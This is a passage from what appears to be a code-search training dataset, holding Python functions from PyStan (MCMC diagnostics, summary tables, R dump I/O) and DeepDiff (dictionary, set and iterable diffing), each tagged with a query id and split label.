        ratio = n_eff / n_iter
        if ((ratio < 0.001) or np.isnan(ratio) or np.isinf(ratio)):
            if verbosity > 1:
                logger.warning('n_eff / iter for parameter {} is {:.3g}!'.format(name, ratio))
            no_warning = False
            if verbosity <= 1:
                # One bad parameter is enough unless per-parameter detail
                # was requested.
                break
    if no_warning:
        if verbosity > 2:
            logger.info('n_eff / iter looks reasonable for all parameters')
        return True
    else:
        if verbosity > 0:
            logger.warning('n_eff / iter below 0.001 indicates that the effective sample size has likely been overestimated')
        return False
python
{ "resource": "" }
q29667
check_hmc_diagnostics
train
def check_hmc_diagnostics(fit, pars=None, verbose=True, per_chain=False, checks=None): """Checks all hmc diagnostics Parameters ---------- fit : StanFit4Model object verbose : bool or int, optional If ``verbose`` is ``False`` or a nonpositive integer, no diagnostic messages are printed, and only the return value of the function conveys diagnostic information. If it is ``True`` (the default) or an integer greater than zero, then diagnostic messages are printed only for diagnostic checks that fail. If ``verbose`` is an integer greater than 1, then parameter (quantile) diagnostics are printed. If ``verbose`` is greater than 2, then extra diagnostic messages are printed. per_chain : bool, optional Where applicable, print diagnostics on a per-chain basis. This applies mainly to the divergence and treedepth checks. checks : list, {"n_eff", "Rhat", "divergence", "treedepth", "energy"}, optional By default run all checks. If ``checks`` is defined, run only checks given in ``checks`` Returns ------- out_dict : dict A dictionary where each key is the name of a diagnostic check, and the value associated with each key is a Boolean value that is True if the check passed and False otherwise. Possible valid keys are 'n_eff', 'Rhat', 'divergence', 'treedepth', and 'energy', though which keys are available will depend upon the sampling algorithm used. 
""" # For consistency with the individual diagnostic functions verbosity = int(verbose) all_checks = {"n_eff", "Rhat", "divergence", "treedepth", "energy"} if checks is None: checks = all_checks else: undefined_checks = [] for c in checks: # accept lowercase Rhat if c == "rhat": continue if c not in all_checks: undefined_checks.append(c) if undefined_checks: ucstr = "[" + ", ".join(undefined_checks) + "]" msg = "checks: {} are not legal checks: {}".format(ucstr, all_checks) raise TypeError(msg) out_dict = {} if "n_eff" in checks: try: out_dict['n_eff'] = check_n_eff(fit, pars, verbose) except ValueError: if verbosity > 0: logger.warning('Skipping check of effective sample size (n_eff)') if ("Rhat" in checks) or ("rhat" in checks): try: out_dict['Rhat'] = check_rhat(fit, pars, verbose) except ValueError: if verbosity > 0: logger.warning('Skipping check of potential scale reduction factors (Rhat)') if "divergence" in checks: try: out_dict['divergence'] = check_div(fit, verbose, per_chain) except ValueError: if verbosity > 0: logger.warning('Skipping check of divergent transitions (divergence)') if "treedepth" in checks: try: out_dict['treedepth'] = check_treedepth(fit, verbose, per_chain) except ValueError: if verbosity > 0: logger.warning('Skipping check of transitions ending prematurely due to maximum tree depth limit (treedepth)') if "energy" in checks: try: out_dict['energy'] = check_energy(fit, verbose) except ValueError: if verbosity > 0: logger.warning('Skipping check of E-BFMI (energy)') return out_dict
python
{ "resource": "" }
q29668
stansummary
train
def stansummary(fit, pars=None, probs=(0.025, 0.25, 0.5, 0.75, 0.975), digits_summary=2):
    """Summary statistic table.

    Parameters
    ----------
    fit : StanFit4Model object
    pars : str or sequence of str, optional
        Parameter names. By default use all parameters.
    probs : sequence of float, optional
        Quantiles. By default, (0.025, 0.25, 0.5, 0.75, 0.975)
    digits_summary : int, optional
        Number of significant digits. By default, 2

    Returns
    -------
    summary : string
        Table includes mean, se_mean, sd, probs_0, ..., probs_n, n_eff and
        Rhat.

    Examples
    --------
    >>> model_code = 'parameters {real y;} model {y ~ normal(0,1);}'
    >>> m = StanModel(model_code=model_code, model_name="example_model")
    >>> fit = m.sampling()
    >>> print(stansummary(fit))
    Inference for Stan model: example_model.
    4 chains, each with iter=2000; warmup=1000; thin=1;
    post-warmup draws per chain=1000, total post-warmup draws=4000.
    <BLANKLINE>
           mean se_mean     sd   2.5%    25%    50%    75%  97.5%  n_eff   Rhat
    y      0.01    0.03    1.0  -2.01  -0.68   0.02   0.72   1.97   1330    1.0
    lp__   -0.5    0.02   0.68  -2.44  -0.66  -0.24  -0.05 -5.5e-4  1555    1.0
    <BLANKLINE>
    Samples were drawn using NUTS at Thu Aug 17 00:52:25 2017.
    For each parameter, n_eff is a crude measure of effective sample size,
    and Rhat is the potential scale reduction factor on split chains (at
    convergence, Rhat=1).
    """
    # Modes 1 and 2 carry no samples; return a short explanatory string.
    if fit.mode == 1:
        return "Stan model '{}' is of mode 'test_grad';\n"\
               "sampling is not conducted.".format(fit.model_name)
    elif fit.mode == 2:
        return "Stan model '{}' does not contain samples.".format(fit.model_name)

    # Post-warmup draws kept per chain.
    n_kept = [s - w for s, w in zip(fit.sim['n_save'], fit.sim['warmup2'])]

    header = "Inference for Stan model: {}.\n".format(fit.model_name)
    header += "{} chains, each with iter={}; warmup={}; thin={}; \n"
    # NOTE: the trailing sum(n_kept) argument has no matching placeholder in
    # the format string above; extra positional args to str.format are
    # silently ignored.
    header = header.format(fit.sim['chains'], fit.sim['iter'], fit.sim['warmup'],
                           fit.sim['thin'], sum(n_kept))
    header += "post-warmup draws per chain={}, total post-warmup draws={}.\n\n"
    header = header.format(n_kept[0], sum(n_kept))
    footer = "\n\nSamples were drawn using {} at {}.\n"\
        "For each parameter, n_eff is a crude measure of effective sample size,\n"\
        "and Rhat is the potential scale reduction factor on split chains (at \n"\
        "convergence, Rhat=1)."
    sampler = fit.sim['samples'][0]['args']['sampler_t']
    date = fit.date.strftime('%c')  # %c is locale's representation
    footer = footer.format(sampler, date)
    s = _summary(fit, pars, probs)
    body = _array_to_table(s['summary'], s['summary_rownames'],
                           s['summary_colnames'], digits_summary)
    return header + body + footer
python
{ "resource": "" }
q29669
_array_to_table
train
def _array_to_table(arr, rownames, colnames, n_digits):
    """Render a 2-D array as right-aligned text with row and column labels.

    Example:

        mean se_mean  sd 2.5%  25%  50%  75% 97.5% n_eff Rhat
    beta[1,1]  0.0     0.0 1.0 -2.0 -0.7  0.0  0.7   2.0  4000    1
    lp__      -4.2     0.1 2.1 -9.4 -5.4 -3.8 -2.7  -1.2   317    1
    """
    assert arr.shape == (len(rownames), len(colnames))
    label_width = max(len(name) for name in rownames)
    max_col_width = 7
    min_col_width = 5
    # One width per data column; the row-label column is handled separately.
    col_widths = [max(max_col_width, max(len(name) + 1, min_col_width))
                  for name in colnames]

    header_cells = ['{:>{width}}'.format('', width=label_width)]
    header_cells += ['{:>{width}}'.format(name, width=w)
                     for name, w in zip(colnames, col_widths)]
    lines = [''.join(header_cells)]

    for label, row in zip(rownames, arr):
        cells = ['{:{width}}'.format(label, width=label_width)]
        for col_name, value, w in zip(colnames, row, col_widths):
            if col_name == 'n_eff' and not np.isnan(value):
                # Effective sample sizes are displayed as whole numbers.
                value = int(round(value, 0))
            cells.append('{:>{width}}'.format(
                _format_number(value, n_digits, max_col_width - 1), width=w))
        lines.append(''.join(cells))
    return '\n'.join(lines)
python
{ "resource": "" }
q29670
_format_number_si
train
def _format_number_si(num, n_signif_figures): """Format a number using scientific notation to given significant figures""" if math.isnan(num) or math.isinf(num): return str(num) leading, exp = '{:E}'.format(num).split('E') leading = round(float(leading), n_signif_figures - 1) exp = exp[:1] + exp[2:] if exp[1] == '0' else exp formatted = '{}e{}'.format(leading, exp.lstrip('+')) return formatted
python
{ "resource": "" }
q29671
_format_number
train
def _format_number(num, n_signif_figures, max_width): """Format a number as a string while obeying space constraints. `n_signif_figures` is the minimum number of significant figures expressed `max_width` is the maximum width in characters allowed """ if max_width < 6: raise NotImplementedError("Guaranteed formatting in fewer than 6 characters not supported.") if math.isnan(num) or math.isinf(num): return str(num) # add 0.5 to prevent log(0) errors; only affects n_digits calculation for num > 0 n_digits = lambda num: math.floor(math.log10(abs(num) + 0.5)) + 1 if abs(num) > 10**-n_signif_figures and n_digits(num) <= max_width - n_signif_figures: return str(round(num, n_signif_figures))[:max_width].rstrip('.') elif _number_width(num) <= max_width: if n_digits(num) >= n_signif_figures: # the int() is necessary for consistency between Python 2 and 3 return str(int(round(num))) else: return str(num) else: return _format_number_si(num, n_signif_figures)
python
{ "resource": "" }
q29672
_combine_msd_quan
train
def _combine_msd_quan(msd, quan): """Combine msd and quantiles in chain summary Parameters ---------- msd : array of shape (num_params, 2, num_chains) mean and sd for chains cquan : array of shape (num_params, num_quan, num_chains) quantiles for chains Returns ------- msdquan : array of shape (num_params, 2 + num_quan, num_chains) """ dim1 = msd.shape n_par, _, n_chains = dim1 ll = [] for i in range(n_chains): a1 = msd[:, :, i] a2 = quan[:, :, i] ll.append(np.column_stack([a1, a2])) msdquan = np.dstack(ll) return msdquan
python
{ "resource": "" }
q29673
_summary_sim
train
def _summary_sim(sim, pars, probs):
    """Summarize chains together and separately.

    REF: rstan/rstan/R/misc.R

    Parameters are unraveled in *column-major order*.

    Parameters
    ----------
    sim : dict
        dict from a stanfit fit object, i.e., fit['sim']
    pars : Iterable of str
        parameter names
    probs : Iterable of probs
        desired quantiles

    Returns
    -------
    summaries : dict of array
        This dictionary contains the following arrays indexed by the keys
        given below:
        - 'msd' : array of shape (num_params, 2) with mean and sd
        - 'sem' : array of length num_params with standard error for the mean
        - 'c_msd' : array of shape (num_params, 2, num_chains)
        - 'quan' : array of shape (num_params, num_quan)
        - 'c_quan' : array of shape (num_params, num_quan, num_chains)
        - 'ess' : effective sample sizes
        - 'rhat' : split potential scale reduction factors
        - 'c_msd_names', 'c_quan_names' : axis-label dicts for the per-chain
          arrays
        - 'row_major_idx', 'col_major_idx' : flat parameter indexes in the
          two orderings

    Note
    ----
    `_summary_sim` has the parameters in *column-major* order whereas
    `_summary` gives them in *row-major* order. (This follows RStan.)
    """
    # NOTE: this follows RStan rather closely. Some of the calculations here
    probs_len = len(probs)
    n_chains = len(sim['samples'])
    # tidx is a dict with keys that are parameters and values that are their
    # indices using column-major ordering
    tidx = _pars_total_indexes(sim['pars_oi'], sim['dims_oi'], sim['fnames_oi'], pars)
    tidx_colm = [tidx[par] for par in pars]
    tidx_colm = list(itertools.chain(*tidx_colm))  # like R's unlist()
    tidx_rowm = [tidx[par+'_rowmajor'] for par in pars]
    tidx_rowm = list(itertools.chain(*tidx_rowm))
    tidx_len = len(tidx_colm)
    # Per-parameter summaries (pooled and per chain), stacked into arrays.
    lmsdq = [_get_par_summary(sim, i, probs) for i in tidx_colm]
    msd = np.row_stack([x['msd'] for x in lmsdq])
    quan = np.row_stack([x['quan'] for x in lmsdq])
    probs_str = tuple(["{:g}%".format(100*p) for p in probs])
    msd.shape = (tidx_len, 2)
    quan.shape = (tidx_len, probs_len)

    c_msd = np.row_stack([x['c_msd'] for x in lmsdq])
    c_quan = np.row_stack([x['c_quan'] for x in lmsdq])
    c_msd.shape = (tidx_len, 2, n_chains)
    c_quan.shape = (tidx_len, probs_len, n_chains)
    # Chain ids come from the stored sampler args when available; otherwise
    # fall back to 0..n_chains-1.
    sim_attr_args = sim.get('args', None)
    if sim_attr_args is None:
        cids = list(range(n_chains))
    else:
        cids = [x['chain_id'] for x in sim_attr_args]

    c_msd_names = dict(parameters=np.asarray(sim['fnames_oi'])[tidx_colm],
                       stats=("mean", "sd"),
                       chains=tuple("chain:{}".format(cid) for cid in cids))
    c_quan_names = dict(parameters=np.asarray(sim['fnames_oi'])[tidx_colm],
                        stats=probs_str,
                        chains=tuple("chain:{}".format(cid) for cid in cids))
    ess_and_rhat = np.array([pystan.chains.ess_and_splitrhat(sim, n) for n in tidx_colm])
    ess, rhat = [arr.ravel() for arr in np.hsplit(ess_and_rhat, 2)]
    return dict(msd=msd, c_msd=c_msd, c_msd_names=c_msd_names, quan=quan,
                c_quan=c_quan, c_quan_names=c_quan_names,
                sem=msd[:, 1] / np.sqrt(ess), ess=ess, rhat=rhat,
                row_major_idx=tidx_rowm, col_major_idx=tidx_colm)
python
{ "resource": "" }
q29674
_get_par_summary
train
def _get_par_summary(sim, n, probs):
    """Summarize one flat parameter, pooled across chains and per chain.

    Parameters
    ----------
    sim : dict
        From a stanfit object.
    n : int
        Flat parameter index.
    probs : iterable
        Desired quantiles.

    Returns
    -------
    dict
        Keys 'msd' and 'quan' hold pooled mean/sd and quantiles; 'c_msd'
        and 'c_quan' hold the flattened per-chain equivalents.
    """
    # One array of post-warmup draws per chain for parameter index ``n``.
    chain_draws = _get_samples(n, sim, inc_warmup=False)

    def mean_sd(draws):
        return (np.mean(draws), np.std(draws, ddof=1))

    def quantiles(draws):
        return mquantiles(draws, probs)

    c_msd = np.array([mean_sd(chain) for chain in chain_draws]).flatten()
    c_quan = np.array([quantiles(chain) for chain in chain_draws]).flatten()
    pooled = np.asarray(chain_draws).flatten()
    msd = np.asarray(mean_sd(pooled))
    quan = quantiles(np.asarray(pooled))
    return dict(msd=msd, quan=quan, c_msd=c_msd, c_quan=c_quan)
python
{ "resource": "" }
q29675
_organize_inits
train
def _organize_inits(inits, pars, dims):
    """Convert flat per-chain initial-value vectors into parameter dicts.

    The entry for 'lp__' is removed from the parameter list before the
    conversion. NOTE(review): when 'lp__' is present, ``pars`` and ``dims``
    are modified in place -- preserved here for compatibility with existing
    callers.

    Parameters
    ----------
    inits : list
        List of flat initial-value vectors, one per chain.
    pars : list of str
    dims : list of list of int

    Returns
    -------
    list of dict
    """
    if 'lp__' in pars:
        lp_index = pars.index('lp__')
        del pars[lp_index]
        del dims[lp_index]
    starts = _calc_starts(dims)
    return [_par_vector2dict(chain_init, pars, dims, starts)
            for chain_init in inits]
python
{ "resource": "" }
q29676
_calc_starts
train
def _calc_starts(dims): """Calculate starting indexes Parameters ---------- dims : list of list of int from (via cython conversion) vector[vector[uint]] dims Examples -------- >>> _calc_starts([[8, 2], [5], [6, 2]]) [0, 16, 21] """ # NB: Python uses 0-indexing; R uses 1-indexing. l = len(dims) s = [np.prod(d) for d in dims] starts = np.cumsum([0] + s)[0:l].tolist() # coerce things into ints before returning return [int(i) for i in starts]
python
{ "resource": "" }
q29677
_par_vector2dict
train
def _par_vector2dict(v, pars, dims, starts=None): """Turn a vector of samples into an OrderedDict according to param dims. Parameters ---------- y : list of int or float pars : list of str parameter names dims : list of list of int list of dimensions of parameters Returns ------- d : dict Examples -------- >>> v = list(range(31)) >>> dims = [[5], [5, 5], []] >>> pars = ['mu', 'Phi', 'eta'] >>> _par_vector2dict(v, pars, dims) # doctest: +ELLIPSIS OrderedDict([('mu', array([0, 1, 2, 3, 4])), ('Phi', array([[ 5, ... """ if starts is None: starts = _calc_starts(dims) d = OrderedDict() for i in range(len(pars)): l = int(np.prod(dims[i])) start = starts[i] end = start + l y = np.asarray(v[start:end]) if len(dims[i]) > 1: y = y.reshape(dims[i], order='F') # 'F' = Fortran, column-major d[pars[i]] = y.squeeze() if y.shape == (1,) else y return d
python
{ "resource": "" }
q29678
_pars_total_indexes
train
def _pars_total_indexes(names, dims, fnames, pars):
    """Obtain all flat indexes for parameters `pars`.

    `names` references variables that are in column-major order.

    Parameters
    ----------
    names : sequence of str
        All the parameter names.
    dims : sequence of list of int
        Dimensions, in same order as `names`.
    fnames : sequence of str
        All the scalar (flat) parameter names, e.g. 'eta[1]'.
    pars : sequence of str
        The parameters of interest; every element is assumed to be in
        `names`.

    Returns
    -------
    indexes : OrderedDict of tuple of int
        Keyed by parameter name; for each parameter there is also a key
        `par`+'_rowmajor' holding the row-major index ordering. Within a
        parameter the plain key follows column-major (Fortran) order,
        i.e. like R's matrix(..., bycol=TRUE).
    """
    starts = _calc_starts(dims)
    indexes = OrderedDict()
    for par in pars:
        if par in fnames:
            # Scalar parameter: a single flat index, identical for both
            # column- and row-major views.
            idx = (fnames.index(par),)
            indexes[par] = idx
            indexes[par + '_rowmajor'] = idx
        else:
            pos = names.index(par)
            base = starts[pos]
            col_major = base + np.arange(np.prod(dims[pos]))
            row_major = base + _idx_col2rowm(dims[pos])
            indexes[par] = tuple(col_major)
            indexes[par + '_rowmajor'] = tuple(row_major)
    return indexes
python
{ "resource": "" }
q29679
_idx_col2rowm
train
def _idx_col2rowm(d): """Generate indexes to change from col-major to row-major ordering""" if 0 == len(d): return 1 if 1 == len(d): return np.arange(d[0]) # order='F' indicates column-major ordering idx = np.array(np.arange(np.prod(d))).reshape(d, order='F').T return idx.flatten(order='F')
python
{ "resource": "" }
q29680
_get_samples
train
def _get_samples(n, sim, inc_warmup=True):
    # NOTE: this is in stanfit-class.R in RStan (rather than misc.R)
    """Get chains for `n`th parameter.

    Parameters
    ----------
    n : int
        Flat index of the parameter whose draws are requested.
    sim : dict
        A dictionary tied to a StanFit4Model instance.
    inc_warmup : bool, optional
        Whether warmup draws are included (default True).

    Returns
    -------
    chains : list of array
        Each chain is an element in the list.
    """
    # Thin wrapper: delegates to pystan's internal _misc implementation.
    return pystan._misc.get_samples(n, sim, inc_warmup)
python
{ "resource": "" }
q29681
_writable_sample_file
train
def _writable_sample_file(file, warn=True, wfun=None): """Check to see if file is writable, if not use temporary file""" if wfun is None: wfun = lambda x, y: '"{}" is not writable; use "{}" instead'.format(x, y) dir = os.path.dirname(file) dir = os.getcwd() if dir == '' else dir if os.access(dir, os.W_OK): return file else: dir2 = tempfile.mkdtemp() if warn: logger.warning(wfun(dir, dir2)) return os.path.join(dir2, os.path.basename(file))
python
{ "resource": "" }
q29682
stan_rdump
train
def stan_rdump(data, filename):
    """Dump a dictionary with model data into a file using the R dump
    format that Stan supports.

    Parameters
    ----------
    data : dict
        Mapping of variable names to values.
    filename : str
        Destination path.

    Raises
    ------
    ValueError
        If any variable name is not a legal Stan identifier (checked
        before anything is written).
    """
    illegal = [name for name in data if not is_legal_stan_vname(name)]
    if illegal:
        raise ValueError("Variable name {} is not allowed in Stan".format(illegal[0]))
    with open(filename, 'w') as f:
        f.write(_dict_to_rdump(data))
python
{ "resource": "" }
q29683
_rdump_value_to_numpy
train
def _rdump_value_to_numpy(s): """ Convert a R dump formatted value to Numpy equivalent For example, "c(1, 2)" becomes ``array([1, 2])`` Only supports a few R data structures. Will not work with European decimal format. """ if "structure" in s: vector_str, shape_str = re.findall(r'c\([^\)]+\)', s) shape = [int(d) for d in shape_str[2:-1].split(',')] if '.' in vector_str: arr = np.array([float(v) for v in vector_str[2:-1].split(',')]) else: arr = np.array([int(v) for v in vector_str[2:-1].split(',')]) # 'F' = Fortran, column-major arr = arr.reshape(shape, order='F') elif "c(" in s: if '.' in s: arr = np.array([float(v) for v in s[2:-1].split(',')], order='F') else: arr = np.array([int(v) for v in s[2:-1].split(',')], order='F') else: arr = np.array(float(s) if '.' in s else int(s)) return arr
python
{ "resource": "" }
q29684
read_rdump
train
def read_rdump(filename):
    """Read data formatted using the R dump format.

    Parameters
    ----------
    filename : str
        Path of the R dump file.

    Returns
    -------
    data : OrderedDict
        Variable names mapped to NumPy values.

    Raises
    ------
    ValueError
        If variable names cannot be paired with values.
    """
    # Use a context manager: the original `open(filename).read()` leaked
    # the file handle.
    with open(filename) as f:
        contents = f.read().strip()
    # Raw strings: '\w' in a plain literal is an invalid escape sequence
    # (SyntaxWarning on modern Python).
    names = [name.strip() for name in
             re.findall(r'^(\w+) <-', contents, re.MULTILINE)]
    values = [value.strip() for value in
              re.split(r'\w+ +<-', contents) if value]
    if len(values) != len(names):
        raise ValueError("Unable to read file."
                         " Unable to pair variable name with value.")
    data = OrderedDict()
    for name, value in zip(names, values):
        data[name] = _rdump_value_to_numpy(value)
    return data
python
{ "resource": "" }
q29685
load_module
train
def load_module(module_name, module_path):
    """Load the module named `module_name` from `module_path`
    independently of the Python version.
    """
    if sys.version_info < (3, 0):
        # Python 2: use the (now-removed) imp machinery.
        import imp
        found = imp.find_module(module_name, [module_path])
        return imp.load_module(module_name, *found)
    # Python 3: register Cython's import hook so .pyx modules compile on
    # import, then import by name from the given path.
    import pyximport
    pyximport.install()
    sys.path.append(module_path)
    return __import__(module_name)
python
{ "resource": "" }
q29686
_open
train
def _open(file, mode='r', buffering=-1, encoding=None, errors=None,
          newline=None, closefd=True, opener=None, *, loop=None, executor=None):
    """Open a file asynchronously and return a wrapped async file object.

    Mirrors the built-in ``open()`` signature; the blocking open runs in
    an executor so the event loop is not stalled. Additional keyword-only
    parameters:

    loop : event loop, optional
        Defaults to the current event loop.
    executor : optional
        Executor used for the blocking open call (also handed to
        ``wrap`` — presumably for subsequent file operations; confirm
        against ``wrap``'s implementation).
    """
    if loop is None:
        loop = asyncio.get_event_loop()
    # Bind all open() arguments now; run_in_executor takes a callable
    # plus positional args only, so partial carries the keywords.
    cb = partial(sync_open, file, mode=mode, buffering=buffering,
                 encoding=encoding, errors=errors, newline=newline,
                 closefd=closefd, opener=opener)
    # Generator-based coroutine: suspend until the executor finishes.
    f = yield from loop.run_in_executor(executor, cb)
    return wrap(f, loop=loop, executor=executor)
python
{ "resource": "" }
q29687
DeepDiff._get_view_results
train
def _get_view_results(self, view):
    """Return the diff results rendered in the requested view."""
    if view != TREE_VIEW:
        # The text view is derived from the tree, then cleaned up.
        text_result = TextResult(tree_results=self.tree)
        text_result.cleanup()  # clean up text-style result dictionary
        return text_result
    return self.tree
python
{ "resource": "" }
q29688
DeepDiff.__diff_dict
train
def __diff_dict(self, level, parents_ids=frozenset({}), print_as_attribute=False,
                override=False, override_t1=None, override_t2=None):
    """Difference of 2 dictionaries.

    When `print_as_attribute` is set the same machinery diffs an
    object's attribute dict, reporting attribute_* keys instead of
    dictionary_item_* keys. When `override` is set, `override_t1` and
    `override_t2` are compared instead of `level.t1`/`level.t2` without
    altering the level chain.
    """
    if override:
        # for special stuff like custom objects and named tuples we receive preprocessed t1 and t2
        # but must not spoil the chain (=level) with it
        t1 = override_t1
        t2 = override_t2
    else:
        t1 = level.t1
        t2 = level.t2

    # Select report keys and relationship class per mode.
    if print_as_attribute:
        item_added_key = "attribute_added"
        item_removed_key = "attribute_removed"
        rel_class = AttributeRelationship
    else:
        item_added_key = "dictionary_item_added"
        item_removed_key = "dictionary_item_removed"
        rel_class = DictRelationship

    t1_keys = set(t1.keys())
    t2_keys = set(t2.keys())
    if self.ignore_string_type_changes or self.ignore_numeric_type_changes:
        # Compare "cleaned" (type-normalized) keys, but keep a mapping
        # back to the real keys for value lookups below.
        t1_clean_to_keys = self.__get_clean_to_keys_mapping(keys=t1_keys, level=level)
        t2_clean_to_keys = self.__get_clean_to_keys_mapping(keys=t2_keys, level=level)
        t1_keys = set(t1_clean_to_keys.keys())
        t2_keys = set(t2_clean_to_keys.keys())
    else:
        t1_clean_to_keys = t2_clean_to_keys = None

    t_keys_intersect = t2_keys.intersection(t1_keys)
    t_keys_added = t2_keys - t_keys_intersect
    t_keys_removed = t1_keys - t_keys_intersect

    for key in t_keys_added:
        # Translate a cleaned key back to the real key, if applicable.
        key = t2_clean_to_keys[key] if t2_clean_to_keys else key
        change_level = level.branch_deeper(
            notpresent,
            t2[key],
            child_relationship_class=rel_class,
            child_relationship_param=key)
        self.__report_result(item_added_key, change_level)

    for key in t_keys_removed:
        key = t1_clean_to_keys[key] if t1_clean_to_keys else key
        change_level = level.branch_deeper(
            t1[key],
            notpresent,
            child_relationship_class=rel_class,
            child_relationship_param=key)
        self.__report_result(item_removed_key, change_level)

    for key in t_keys_intersect:  # key present in both dicts - need to compare values
        # The cleaned key may map to different real keys on each side.
        key1 = t1_clean_to_keys[key] if t1_clean_to_keys else key
        key2 = t2_clean_to_keys[key] if t2_clean_to_keys else key
        item_id = id(t1[key1])
        # Cycle guard: skip objects already on the current ancestry path.
        if parents_ids and item_id in parents_ids:
            continue
        parents_ids_added = add_to_frozen_set(parents_ids, item_id)

        # Go one level deeper
        next_level = level.branch_deeper(
            t1[key1],
            t2[key2],
            child_relationship_class=rel_class,
            child_relationship_param=key)
        self.__diff(next_level, parents_ids_added)
python
{ "resource": "" }
q29689
DeepDiff.__diff_set
train
def __diff_set(self, level):
    """Report added and removed items between two sets."""
    t1_hashtable = self.__create_hashtable(level.t1, level)
    t2_hashtable = self.__create_hashtable(level.t2, level)

    added_hashes = set(t2_hashtable.keys()) - set(t1_hashtable.keys())
    removed_hashes = set(t1_hashtable.keys()) - set(t2_hashtable.keys())

    for h in added_hashes:
        change_level = level.branch_deeper(
            notpresent, t2_hashtable[h].item,
            child_relationship_class=SetRelationship)
        self.__report_result('set_item_added', change_level)

    for h in removed_hashes:
        change_level = level.branch_deeper(
            t1_hashtable[h].item, notpresent,
            child_relationship_class=SetRelationship)
        self.__report_result('set_item_removed', change_level)
python
{ "resource": "" }
q29690
DeepDiff.__diff_iterable
train
def __diff_iterable(self, level, parents_ids=frozenset({})):
    """Compare two iterables pairwise, in order."""
    # Pick the relationship class based on whether both sides support
    # subscripting.
    if self.__iterables_subscriptable(level.t1, level.t2):
        rel_class = SubscriptableIterableRelationship
    else:
        rel_class = NonSubscriptableIterableRelationship

    paired = zip_longest(level.t1, level.t2, fillvalue=ListItemRemovedOrAdded)
    for index, (old_item, new_item) in enumerate(paired):
        if new_item is ListItemRemovedOrAdded:
            # t1 is longer: this item was removed completely.
            change_level = level.branch_deeper(
                old_item, notpresent,
                child_relationship_class=rel_class,
                child_relationship_param=index)
            self.__report_result('iterable_item_removed', change_level)
        elif old_item is ListItemRemovedOrAdded:
            # t2 is longer: a new item was added.
            change_level = level.branch_deeper(
                notpresent, new_item,
                child_relationship_class=rel_class,
                child_relationship_param=index)
            self.__report_result('iterable_item_added', change_level)
        else:
            # Both present: recurse unless this object already appears on
            # the current ancestry path (cycle guard).
            item_id = id(old_item)
            if parents_ids and item_id in parents_ids:
                continue
            next_level = level.branch_deeper(
                old_item, new_item,
                child_relationship_class=rel_class,
                child_relationship_param=index)
            self.__diff(next_level, add_to_frozen_set(parents_ids, item_id))
python
{ "resource": "" }
q29691
DeepDiff.__diff_iterable_with_deephash
train
def __diff_iterable_with_deephash(self, level):
    """Diff of unhashable iterables. Only used when ignoring the order.

    Items on each side are keyed by their deep hash, so equal items
    match regardless of position. With `report_repetition` enabled,
    every occurrence is reported individually and count changes of an
    item appearing on both sides are reported as 'repetition_change';
    otherwise only the first index of each added/removed item is used.
    """
    t1_hashtable = self.__create_hashtable(level.t1, level)
    t2_hashtable = self.__create_hashtable(level.t2, level)

    t1_hashes = set(t1_hashtable.keys())
    t2_hashes = set(t2_hashtable.keys())

    hashes_added = t2_hashes - t1_hashes
    hashes_removed = t1_hashes - t2_hashes

    if self.report_repetition:
        # Report every occurrence (index) of each added/removed item.
        for hash_value in hashes_added:
            for i in t2_hashtable[hash_value].indexes:
                change_level = level.branch_deeper(
                    notpresent,
                    t2_hashtable[hash_value].item,
                    child_relationship_class=SubscriptableIterableRelationship,  # TODO: that might be a lie!
                    child_relationship_param=i
                )  # TODO: what is this value exactly?
                self.__report_result('iterable_item_added', change_level)

        for hash_value in hashes_removed:
            for i in t1_hashtable[hash_value].indexes:
                change_level = level.branch_deeper(
                    t1_hashtable[hash_value].item,
                    notpresent,
                    child_relationship_class=SubscriptableIterableRelationship,  # TODO: that might be a lie!
                    child_relationship_param=i)
                self.__report_result('iterable_item_removed', change_level)

        items_intersect = t2_hashes.intersection(t1_hashes)

        for hash_value in items_intersect:
            t1_indexes = t1_hashtable[hash_value].indexes
            t2_indexes = t2_hashtable[hash_value].indexes
            t1_indexes_len = len(t1_indexes)
            t2_indexes_len = len(t2_indexes)
            if t1_indexes_len != t2_indexes_len:  # this is a repetition change!
                # create "change" entry, keep current level untouched to handle further changes
                repetition_change_level = level.branch_deeper(
                    t1_hashtable[hash_value].item,
                    t2_hashtable[hash_value].item,  # nb: those are equal!
                    child_relationship_class=SubscriptableIterableRelationship,  # TODO: that might be a lie!
                    child_relationship_param=t1_hashtable[hash_value]
                    .indexes[0])
                repetition_change_level.additional['repetition'] = RemapDict(
                    old_repeat=t1_indexes_len,
                    new_repeat=t2_indexes_len,
                    old_indexes=t1_indexes,
                    new_indexes=t2_indexes)
                self.__report_result('repetition_change',
                                     repetition_change_level)

    else:
        # Without repetition reporting, only the first index of each
        # added/removed item is attached to the report.
        for hash_value in hashes_added:
            change_level = level.branch_deeper(
                notpresent,
                t2_hashtable[hash_value].item,
                child_relationship_class=SubscriptableIterableRelationship,  # TODO: that might be a lie!
                child_relationship_param=t2_hashtable[hash_value].indexes[
                    0])  # TODO: what is this value exactly?
            self.__report_result('iterable_item_added', change_level)

        for hash_value in hashes_removed:
            change_level = level.branch_deeper(
                t1_hashtable[hash_value].item,
                notpresent,
                child_relationship_class=SubscriptableIterableRelationship,  # TODO: that might be a lie!
                child_relationship_param=t1_hashtable[hash_value].indexes[
                    0])
            self.__report_result('iterable_item_removed', change_level)
python
{ "resource": "" }
q29692
DeepDiff.to_dict
train
def to_dict(self):
    """
    Dump dictionary of the text view.

    It does not matter which view you are currently in — the returned
    dictionary always reflects the text view.
    """
    if self.view != TREE_VIEW:
        return dict(self)
    # Tree view: render the text view first, then dump it.
    return dict(self._get_view_results(view=TEXT_VIEW))
python
{ "resource": "" }
q29693
short_repr
train
def short_repr(item, max_length=15):
    """Return repr(item), shortened if it exceeds max_length.

    Long representations keep their first ``max_length - 3`` characters
    plus '...' and the final character (usually a closing quote or
    bracket).
    """
    text = repr(item)
    if len(text) <= max_length:
        return text
    return '{}...{}'.format(text[:max_length - 3], text[-1])
python
{ "resource": "" }
q29694
number_to_string
train
def number_to_string(number, significant_digits, number_format_notation="f"):
    """
    Convert numbers to string considering significant digits.

    Parameters
    ----------
    number : int, float or Decimal
    significant_digits : int
        Number of digits kept after the decimal point.
    number_format_notation : str
        'f' (fixed) or 'e' (scientific); any other value raises
        ValueError.
    """
    try:
        # `number_formatting` maps the notation letter to a format
        # template that takes significant_digits via %-interpolation.
        using = number_formatting[number_format_notation]
    except KeyError:
        raise ValueError("number_format_notation got invalid value of {}. The valid values are 'f' and 'e'".format(number_format_notation)) from None
    if isinstance(number, Decimal):
        tup = number.as_tuple()
        with localcontext() as ctx:
            # Widen the precision so quantize cannot raise
            # InvalidOperation for large coefficients.
